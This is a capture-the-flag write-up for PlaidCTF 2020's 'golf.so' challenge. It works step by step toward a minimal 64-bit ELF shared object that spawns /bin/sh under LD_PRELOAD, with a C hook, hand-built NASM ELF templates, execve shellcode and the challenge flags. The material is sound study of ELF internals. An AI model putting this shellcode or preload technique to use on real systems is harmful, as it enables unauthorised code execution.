[Misc] PCTF2020 - golf.so

Golf.so
Solves: 104

Points: 500

Description:
Upload a 64-bit ELF shared object of size at most 1024 bytes. It should spawn a shell (execute execve(“/bin/sh”, [“/bin/sh”], …)) when used like
LD_PRELOAD= /bin/true

golf.so.pwni.ng

The objective of this challenge is to create an ELF shared library that when running like this:

1
$ LD_PRELOAD=<upload> /bin/true

It would spawn a shell, there is also a requirement the shared library must be less than 1024 bytes to pass the first level. The first thing I tried to do is to use the classic gcc.

First I look up at the binary /bin/true with ghidra and It looks like /bin/true automaticly exits if the arguments are less than 2, so our option is to either overwrite the entry point or _libc_start_main.

After searching online for the function signature of _libc_start_main I wrote this c file:

1
2
3
4
5
6
7
8
9
10
11
int __libc_start_main(
void *func_ptr,
int argc,
char* argv[],
void (*init_func)(void),
void (*fini_func)(void),
void (*rtld_fini_func)(void),
void *stack_end){
char* args[] = {"/bin/sh",0x0};
execve("/bin/sh", args, 0x0);
}

Compiling it using gcc:

1
2
3
4
$ gcc -shared lol.c -o lol.so
$ LD_PRELOAD=./lol.so /bin/true
$ id
uid=0(root) gid=0(root) groups=0(root)

We got a shell but unfortunately the file is too big:

1
2
ls -ltah lol.so
-rwxr-xr-x 1 root root 16K Apr 20 10:08 lol.so*

16k is a lot and we need to find a way to reduce its size… After some reading on the man page of gcc and some recomendations online I tried to use the following gcc options:

  • norelro compile option.
  • Stripping the binary.
  • Activate no start files option for gcc.
  • nodefault libraries.
  • Turning on optimizations with -O3

This reduced the file size by a considerable amount:

1
2
3
$ gcc -shared -nostartfiles -nodefaultlibs -shared -Wl,-z,norelro -s lol.c -O3
$ ls -ltah a.out
-rwxr-xr-x 1 root root 9.5K Apr 20 10:13 a.out

And 9.5k was the max I could get by just using gcc, we need less than 1k. After this I found this post online about a creating tiny elf binaries by constructing the binary by hand using assembly. Perhaps the post is for elfs of the type ET_EXEC and we need ET_DYN also this was for 32 bits we need 64. The possible file types of an ELF are:

1
2
3
4
5
ET_NONE         An unknown type.     (0x0)
ET_REL A relocatable file. (0x1)
ET_EXEC An executable file. (0x2)
ET_DYN A shared object. (0x3)
ET_CORE A core file. (0x4)

We want ET_DYN a shared object, so after some smart searching on github for examples of shared objects in assembly I found this template, the string I used to find this was:

1
db    0x7f, "ELF" ET_DYN

We can straight up modify the _start label which is the entry point present in the dynamic section, to open a shell we need to execute the syscall execve we need to updated the registers RAX to 0x3b, RDI to a pointer to the string /bin/sh and RSI to a pointer to an array [“/bin/sh”,0x0]. My first shell code was:

1
2
3
4
5
6
7
8
9
10
11
12
_start:
mov rdi,0x68732f6e69622f ; /bin/sh to RDI
push rdi ; push /bin/sh to the stack
push rsp ; push current stack pointer to the stack
pop rdi ; put the pointer of /bin/sh to RDI
push 59 ; push 0x3b to the stack
pop rax ; get 0x3b from the stack to RAX
push 0 ; constructing the the finaly argument of the array
push rdi ; push a pointer of /bin/sh to the stack
mov rsi,rsp ; put a pointer to ["/bin/sh",0x0] to RSI
cdq ; Convert Doubleword to Quadword https://www.aldeid.com/wiki/X86-assembly/Instructions/cdq
syscall ; execve("/bin/sh",["/bin/sh",0x0],0x0)

Putting this code in the template:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104

; build with:
; nasm elf_dll_x64_template.s -f bin -o template_x64_linux_dll.bin

BITS 64
org 0
ehdr:
db 0x7f, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0
dw 3 ; e_type = ET_DYN
dw 62 ; e_machine = EM_X86_64
dd 1 ; e_version = EV_CURRENT
dq _start ; e_entry = _start
dq phdr - $$ ; e_phoff
dd shdr - $$ ; e_shoff
dq 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
dw shentsize ; e_shentsize
dw 2 ; e_shnum
dw 1 ; e_shstrndx
ehdrsize equ $ - ehdr

phdr:
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
dd 2 ; p_type = PT_DYNAMIC
dd 7 ; p_flags = rwx
dq dynsection ; p_offset
dq dynsection ; p_vaddr
dq dynsection ; p_vaddr
dq dynsz ; p_filesz
dq dynsz ; p_memsz
dq 0x1000 ; p_align

shdr:
dd 1 ; sh_name
dd 6 ; sh_type = SHT_DYNAMIC
dq 0 ; sh_flags
dq dynsection ; sh_addr
dq dynsection ; sh_offset
dq dynsz ; sh_size
dd 0 ; sh_link
dd 0 ; sh_info
dq 8 ; sh_addralign
dq 7 ; sh_entsize
shentsize equ $ - shdr
dd 0 ; sh_name
dd 3 ; sh_type = SHT_STRTAB
dq 0 ; sh_flags
dq strtab ; sh_addr
dq strtab ; sh_offset
dq strtabsz ; sh_size
dd 0 ; sh_link
dd 0 ; sh_info
dq 0 ; sh_addralign
dq 0 ; sh_entsize
dynsection:
; DT_INIT
dq 0x0c
dq _start
; DT_STRTAB
dq 0x05
dq strtab
; DT_SYMTAB
dq 0x06
dq strtab
; DT_STRSZ
dq 0x0a
dq 0
; DT_SYMENT
dq 0x0b
dq 0
; DT_NULL
dq 0x00
dq 0
dynsz equ $ - dynsection

strtab:
db 0
db 0
strtabsz equ $ - strtab
global _start
_start:
;db 0xcc
mov rdi,0x68732f6e69622f
push rdi
push rsp
pop rdi
push 59
pop rax
push 0
push rdi
mov rsi,rsp
cdq
syscall

Compiling it:

1
2
3
4
5
6
7
8
$ nasm -f bin -o a.out full.asm
$ ls -ltah a.out
-rw-r--r-- 1 root root 427 Apr 20 11:28 a.out
$ nasm -f bin -o a.out full.asm
$ LD_PRELOAD=./a.out ./true
$ id
uid=0(root) gid=0(root) groups=0(root)
$ exit

So with this we got a shared file with 427 bytes! more than half of the asked 1024 bytes, so lets upload in the site:

1
2
3
You made it to level 1: considerable!
You have 127 bytes left to be thoughtful.
This effort is worthy of 0/2 flags.

So this effort as expected is not enough for a flag, we need to save at least more 127 bytes for the first flag. What I did next was to remove unnecessary sections from the elf something that would not broke the binary.The first thing I did was to remove the Section header (shdr).

Its not really required, so the changes done to full.asm were:

  • e_shoff in the elf header(ehdr) to point to the program header (phdr)
  • e_shentsize in the elf header(ehdr) value to zero
  • e_shnum in the elf header(ehdr) value to zero (the number of section headers set to zero because we completly removed this section)

The full script to cuted.asm:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82

; build with:
; nasm elf_dll_x64_template.s -f bin -o template_x64_linux_dll.bin

BITS 64
org 0
ehdr:
db 0x7f, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0
dw 3 ; e_type = ET_DYN
dw 62 ; e_machine = EM_X86_64
dd 1 ; e_version = EV_CURRENT
dq _start ; e_entry = _start
dq phdr - $$ ; e_phoff
dd phdr - $$ ; e_shoff (chaged to phdr instead of shdr)
dq 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
dw 0 ; e_shentsize (changed to 0)
dw 0 ; e_shnum (changed to 0)
dw 1 ; e_shstrndx
ehdrsize equ $ - ehdr

phdr:
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
dd 2 ; p_type = PT_DYNAMIC
dd 7 ; p_flags = rwx
dq dynsection ; p_offset
dq dynsection ; p_vaddr
dq dynsection ; p_vaddr
dq dynsz ; p_filesz
dq dynsz ; p_memsz
dq 0x1000 ; p_align
; shdr header removed here
dynsection:
; DT_INIT
dq 0x0c
dq _start
; DT_STRTAB
dq 0x05
dq strtab
; DT_SYMTAB
dq 0x06
dq strtab
; DT_STRSZ
dq 0x0a
dq 0
; DT_SYMENT
dq 0x0b
dq 0
; DT_NULL
dq 0x00
dq 0
dynsz equ $ - dynsection

strtab:
db 0
db 0
strtabsz equ $ - strtab
global _start
_start:
;db 0xcc
mov rdi,0x68732f6e69622f
push rdi
push rsp
pop rdi
push 59
pop rax
push 0
push rdi
mov rsi,rsp
cdq
syscall

This was enough to get us the first flag:

1
2
3
4
You made it to level 2: thoughtful! 
You have 75 bytes left to be hand-crafted.
This effort is worthy of 1/2 flags.
PCTF{th0ugh_wE_have_cl1mBed_far_we_MusT_St1ll_c0ntinue_oNward}

A lot of improvements can be done after this for example we have a lot of unnecessary entries in the dynamic section like DT_NULL, DT_SYMENT and DT_STRSZ. We can remove that a save a lot of bytes:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
...truncated...
dynsection:
; DT_INIT
dq 0x0c
dq _start
; DT_STRTAB
dq 0x05
dq strtab
; DT_SYMTAB
dq 0x06
dq strtab
dynsz equ $ - dynsection

strtab:
db 0
db 0
strtabsz equ $ - strtab
global _start
_start:
;db 0xcc
mov rdi,0x68732f6e69622f
push rdi
push rsp
pop rdi
push 59
pop rax
push 0
push rdi
mov rsi,rsp
cdq
syscall
1
2
3
$ nasm -f bin -o a.out cuted.asm
$ ls -ltah a.out
-rw-r--r-- 1 evilgod evilgod 251 Apr 20 11:58 a.out

We reduced to 251 bytes, still far from obtaining the necessary 194 for the 2nd flag. More improvements can be done for example we can cut the last 3 fields of the elf header, which are related to the the section header that we previously removed (e_shentsize, e_shnum and e_shstrndx).

With that we saved up 6 bytes, another way to save even more bytes is to cut the last fields of the PT_DYNAMIC entry from the program header(phdr) fortunelly this won’t break the lib, in the end this entry will overlap with the dynamic section which is perfectly fine. So the next fields to remove are p_vaddr,p_filesz,p_memsz,p_align.

The assembly file looks like this right now:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65

; build with:
; nasm elf_dll_x64_template.s -f bin -o template_x64_linux_dll.bin

BITS 64
org 0
ehdr:
db 0x7f, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0
dw 3 ; e_type = ET_DYN
dw 62 ; e_machine = EM_X86_64
dd 1 ; e_version = EV_CURRENT
dq _start ; e_entry = _start
dq phdr - $$ ; e_phoff
dd phdr - $$ ; e_shoff (chaged to phdr instead of shdr)
dq 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
ehdrsize equ $ - ehdr

phdr:
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
dd 2 ; p_type = PT_DYNAMIC
dd 7 ; p_flags = rwx
dq dynsection ; p_offset
dq dynsection ; p_vaddr
dynsection:
; DT_INIT
dq 0x0c
dq _start
; DT_STRTAB
dq 0x05
dq strtab
; DT_SYMTAB
dq 0x06
dq strtab
dynsz equ $ - dynsection

strtab:
db 0
db 0
strtabsz equ $ - strtab
global _start
_start:
;db 0xcc
mov rdi,0x68732f6e69622f
push rdi
push rsp
pop rdi
push 59
pop rax
push 0
push rdi
mov rsi,rsp
cdq
syscall

Compiling it we can see we got this into to a file of size 213 bytes:

1
2
3
$ nasm -f bin -o a.out cuted.asm
$ ls -ltah a.out
-rw-r--r-- 1 root root 213 Apr 20 12:13 a.out

Still not enough for the final flag, we still need to save 19 bytes, so the next step for me is to optimize the shell code at start, we have some fields we can controll without breaking the binary so the next step for me was to include the /bin/sh string in this kind of fields so we don’t require to put it in the stack and manipulate those pointers. This can save use some bytes.

I saved the /bin/sh string in the p_filesz field of the PT_LOAD entry in the program header.
One thing that helped me a lot while debugging a shell was to put a int 3 instruction before my shell code, this will stop gdb and act like a breakpoint(SIG TRAP) since I wasn’t able to stop at the entry point this helped me a lot on debugging:

1
2
3
4
5
6
7
8
9
10
11
12
13
_start:
db 0xcc ; SIGTRAP (int 3 instruction)
mov rdi,0x68732f6e69622f
push rdi
push rsp
pop rdi
push 59
pop rax
push 0
push rdi
mov rsi,rsp
cdq
syscall

Now going into modifying the p_filesz entry to /bin/sh string:

1
2
3
4
5
6
7
8
9
10
11
...
phdr:
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0x68732f6e69622f ; p_filesz (now has /bin/sh here)
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
...

Also need to get the offset to this entry, like libc this is also a shared library and a space will be assigned for this lib to be located. Luckily a pointer is saved in the RAX register in the begining when the entry code is executed. We can calculated the offset from there by using gdb:

1
2
pwndbg> set environment LD_PRELOAD ./a.out
pwndbg> r

The address present in rax:



So we can verify where the /bin/sh is located by doing:

1
2
pwndbg> x/s $rax-0x62
0x7fff194f205a: "/bin/sh"

After this we can use the lea assembly instruction to get the adress of binsh and save a lot of bytes:

1
2
3
4
5
6
7
8
9
_start:
lea rdi,[rax-0x62]
push 59
pop rax
push 0
push rdi
mov rsi,rsp
cdq
syscall

Lets check how much is left:

1
2
3
$ nasm -f bin -o a.out cuted.asm
$ ls -ltah a.out
-rw-r--r-- 1 root root 204 Apr 20 12:46 a.out

Also we don’t need a space reserving for strtab so we can make it point to _start instead of creating a label with two dbs.

Updating the script from:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
dynsection:
; DT_INIT
dq 0x0c
dq _start
; DT_STRTAB
dq 0x05
dq strtab
; DT_SYMTAB
dq 0x06
dq strtab
dynsz equ $ - dynsection

strtab:
db 0
db 0
strtabsz equ $ - strtab

To:

1
2
3
4
5
6
7
8
9
10
11
dynsection:
; DT_INIT
dq 0x0c
dq _start
; DT_STRTAB
dq 0x05
dq _start
; DT_SYMTAB
dq 0x06
dq _start
dynsz equ $ - dynsection

Two bytes are now saved:

1
2
3
$ nasm -f bin -o a.out cuted.asm
$ ls -ltah a.out
-rw-r--r-- 1 root root 202 Apr 20 12:49 a.out

We now need one final tweak for our script to be able to get the final flag… What I did in the end was to overlap the dynamic section into the PT_DYNAMIC entry, we can control the p_offset field without breaking the elf so we can use it as an index of the dynsection and make a fake DT_STRTAB entry, so the dynamic section will be overlapped saving us something like 0x10 bytes (the old entry DT_STRTAB is removed so we can save 0x10 bytes).

Due to this action we also need to update the offset in the _start(updated to 0x50).
My final payload was:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
BITS 64
org 0
ehdr:
db 0x7f, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0
dw 3 ; e_type = ET_DYN
dw 62 ; e_machine = EM_X86_64
dd 1 ; e_version = EV_CURRENT
dq _start ; e_entry = _start
dq phdr - $$ ; e_phoff
dd phdr - $$ ; e_shoff (chaged to phdr instead of shdr)
dq 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
ehdrsize equ $ - ehdr

phdr:
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0x68732f6e69622f ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
dd 2 ; p_type = PT_DYNAMIC
dd 7 ; p_flags = rwx
dynsection:
; DT_STRTAB
dq 0x5 ; p_offset (OVERLAPPED)
dq dynsection ; p_vaddr
; DT_INIT
dq 0x0c
dq _start
; DT_SYMTAB
dq 0x06
dq _start
global _start
_start:
lea rdi,[rax-0x50]
push 59
pop rax
push 0
push rdi
mov rsi,rsp
;cdq ; this may be needed locally but in the website accepts anyway without this (1 byte save)
syscall

We get a file of 185 bytes :) more than enough to get the final flag

1
2
3
$ nasm -f bin -o a.out cuted.asm
$ ls -ltah a.out
-rw-r--r-- 1 root root 185 Apr 20 12:57 a.out

The flag was:

1
2
3
4
You made it to level 5: record-breaking! You have 9 bytes left to be astounding.
This effort is worthy of 2/2 flags.
PCTF{th0ugh_wE_have_cl1mBed_far_we_MusT_St1ll_c0ntinue_oNward}
PCTF{t0_get_a_t1ny_elf_we_5tick_1ts_hand5_in_its_ears_rtmlpntyea}